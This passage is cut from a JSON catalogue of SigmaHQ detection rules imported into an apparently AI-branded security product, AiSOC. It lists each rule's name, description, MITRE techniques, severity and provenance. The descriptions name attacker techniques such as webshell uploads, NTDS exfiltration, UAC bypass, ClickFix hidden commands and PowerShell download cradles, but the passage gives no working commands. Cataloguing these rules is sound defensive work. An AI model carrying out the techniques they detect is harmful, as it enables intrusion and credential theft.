"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml" } }, { "id": "sigmahq-sigma-39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "type": "detection", "name": "Potential Webshell Creation On Static Website", "description": "Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-webshell-creation-on-static-website.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" } }, { "id": "sigmahq-sigma-39f919f3-980b-4e6f-a975-8af7e507ef2b", "type": "detection", "name": "Critical Hive In Suspicious Location Access Bits Cleared", "description": "Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset.\nThis occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default).\nRegistry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/critical-hive-in-suspicious-location-access-bits-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_kernel_general/win_system_susp_critical_hive_location_access_bits_cleared.yml" } }, { "id": "sigmahq-sigma-3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "type": "detection", "name": "Windows Shell/Scripting Processes Spawning Suspicious Programs", "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1059.001", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-shell-scripting-processes-spawning-suspicious-programs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml" } }, { "id": "sigmahq-sigma-3a716279-c18c-4488-83be-f9ececbfb9fc", "type": "detection", "name": "Linux Setgid Capability Set on a Binary via Setcap Utility", "description": "Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file.\nThis capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs), including setting its current GID to a value that would otherwise be restricted (i.e. GID 0, the root group).\nThis behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1554" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-setgid-capability-set-on-a-binary-via-setcap-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3a716279-c18c-4488-83be-f9ececbfb9fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_cap_setgid.yml" } }, { "id": "sigmahq-sigma-3a734d25-df5c-4b99-8034-af1ddb5883a4", "type": "detection", "name": "Suspicious Scheduled Task Creation", "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scheduled-task-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml" } }, { "id": "sigmahq-sigma-3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "type": "detection", "name": "NTDS Exfiltration Filename Patterns", "description": "Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntds-exfiltration-filename-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" } }, { "id": "sigmahq-sigma-3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55", "type": "detection", "name": "RunMRU Registry Key Deletion - Registry", "description": "Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog.\nIn the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.\nAdversaries may delete this key to cover their tracks after executing commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/runmru-registry-key-deletion-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_runmru.yml" } }, { "id": "sigmahq-sigma-3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", "type": "detection", "name": "VsCode Powershell Profile Modification", "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.013" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vscode-powershell-profile-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml" } }, { "id": "sigmahq-sigma-3ab65069-d82a-4d44-a759-466661a082d1", "type": "detection", "name": "Communication To LocaltoNet Tunneling Service Initiated", "description": "Detects an executable initiating a network connection to \"LocaltoNet\" tunneling sub-domains.\nLocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.\nAttackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1090", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/communication-to-localtonet-tunneling-service-initiated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ab65069-d82a-4d44-a759-466661a082d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_localtonet_tunnel.yml" } }, { "id": "sigmahq-sigma-3ab79e90-9fab-4cdf-a7b2-6522bc742adb", "type": "detection", "name": "HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators", "description": "Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-remotekrbrelay-smb-relay-secrets-dump-module-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ab79e90-9fab-4cdf-a7b2-6522bc742adb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_krbrelay_remote_ioc.yml" } }, { "id": "sigmahq-sigma-3abd6094-7027-475f-9630-8ab9be7b9725", "type": "detection", "name": "Windows Admin Share Mount Via Net.EXE", "description": "Detects when an admin share is mounted using net.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-admin-share-mount-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3abd6094-7027-475f-9630-8ab9be7b9725", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_use_mount_admin_share.yml" } }, { "id": "sigmahq-sigma-3ae1a046-f7db-439d-b7ce-b8b366b81fa6", "type": "detection", "name": "Disable Windows Security Center Notifications", "description": "Detect set UseActionCenterExperience to 0 to disable the Windows security center notification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-windows-security-center-notifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml" } }, { "id": "sigmahq-sigma-3ae9974a-eb09-4044-8e70-8980a50c12c8", "type": "detection", "name": "Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix", "description": "Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection.\nClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar.\nThe victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.004", "T1027.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-explorer-process-with-whitespace-padding-clickfix-filefix.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ae9974a-eb09-4044-8e70-8980a50c12c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_clickfix_filefix_whitespace_padding.yml" } }, { "id": "sigmahq-sigma-3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", "type": "detection", "name": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lolbas-onedrivestandaloneupdater-exe-proxy-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml" } }, { "id": "sigmahq-sigma-3b2c1059-ae5f-40b6-b5d4-6106d3ac20fe", "type": "detection", "name": "Hidden Flag Set On File/Directory Via Chflags - MacOS", "description": "Detects the execution of the \"chflags\" utility with the \"hidden\" flag, in order to hide files on MacOS.\nWhen a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1564.004", "T1552.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hidden-flag-set-on-file-directory-via-chflags-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3b2c1059-ae5f-40b6-b5d4-6106d3ac20fe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml" } }, { "id": "sigmahq-sigma-3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "type": "detection", "name": "Arbitrary File Download Via MSPUB.EXE", "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-mspub-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mspub_download.yml" } }, { "id": "sigmahq-sigma-3b4b232a-af90-427c-a22f-30b0c0837b95", "type": "detection", "name": "CMSTP Execution Process Access", "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.003", "T1559.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/cmstp-execution-process-access.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3b4b232a-af90-427c-a22f-30b0c0837b95", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml" } }, { "id": "sigmahq-sigma-3b4e950b-a3ea-44d3-877e-432071990709", "type": "detection", "name": "Notepad Password Files Discovery", "description": "Detects the execution of Notepad to open a file that has the string \"password\" which may indicate unauthorized access to credentials or suspicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/notepad-password-files-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3b4e950b-a3ea-44d3-877e-432071990709", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_notepad_local_passwd_discovery.yml" } }, { "id": "sigmahq-sigma-3b5b0213-0460-4e3f-8937-3abf98ff7dcc", "type": "detection", "name": "Suspicious Workstation Locking via Rundll32", "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-workstation-locking-via-rundll32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_user32_dll.yml" } }, { "id": "sigmahq-sigma-3b5ba899-9842-4bc2-acc2-12308498bf42", "type": "detection", "name": "Office Application Initiated Network Connection Over Uncommon Ports", "description": "Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-application-initiated-network-connection-over-uncommon-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3b5ba899-9842-4bc2-acc2-12308498bf42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_office_uncommon_ports.yml" } }, { "id": "sigmahq-sigma-3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "type": "detection", "name": "PowerShell Download Pattern", "description": "Detects a Powershell process that contains download commands in its command line string", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-download-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" } }, { "id": "sigmahq-sigma-3b8f4c92-6a51-4d7e-9c3a-8e2d1f5a7b09", "type": "detection", "name": "Uncommon File Created by Notepad++ Updater Gup.EXE", "description": "Detects when the Notepad++ updater (gup.exe) creates files in suspicious or uncommon locations.\nThis could indicate potential exploitation of the updater component to deliver unwanted malware or unwarranted files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1195.002", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-file-created-by-notepad-updater-gup-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3b8f4c92-6a51-4d7e-9c3a-8e2d1f5a7b09", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_gup_uncommon_file_creation.yml" } }, { "id": "sigmahq-sigma-3bad990e-4848-4a78-9530-b427d854aac0", "type": "detection", "name": "Domain Trust Discovery Via Dsquery", "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/domain-trust-discovery-via-dsquery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3bad990e-4848-4a78-9530-b427d854aac0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml" } }, { "id": "sigmahq-sigma-3be619f4-d9ec-4ea8-a173-18fdd01996ab", "type": "detection", "name": "Flush Iptables Ufw Chain", "description": "Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/flush-iptables-ufw-chain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3be619f4-d9ec-4ea8-a173-18fdd01996ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml" } }, { "id": "sigmahq-sigma-3bf1d859-3a7e-44cb-8809-a99e066d3478", "type": "detection", "name": "PowerShell Set-Acl On Windows Folder - PsScript", "description": "Detects PowerShell scripts to set the ACL to a file in the Windows folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-set-acl-on-windows-folder-psscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3bf1d859-3a7e-44cb-8809-a99e066d3478", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_set_acl_susp_location.yml" } }, { "id": "sigmahq-sigma-3c05e90d-7eba-4324-9972-5d7f711a60a8", "type": "detection", "name": "UAC Bypass Tools Using ComputerDefaults", "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-tools-using-computerdefaults.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml" } }, { "id": "sigmahq-sigma-3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", "type": "detection", "name": "Process Creation Using Sysnative Folder", "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-creation-using-sysnative-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_sysnative.yml" } }, { "id": "sigmahq-sigma-3c7d1587-3b13-439f-9941-7d14313dbdfe", "type": "detection", "name": "Potential COM Objects Download Cradles Usage - PS Script", "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-com-objects-download-cradles-usage-ps-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml" } }, { "id": "sigmahq-sigma-3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "type": "detection", "name": "Suspicious Process Created Via Wmic.EXE", "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-created-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_susp_process_creation.yml" } }, { "id": "sigmahq-sigma-3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", "type": "detection", "name": "OpenSSH Server Listening On Socket", "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" 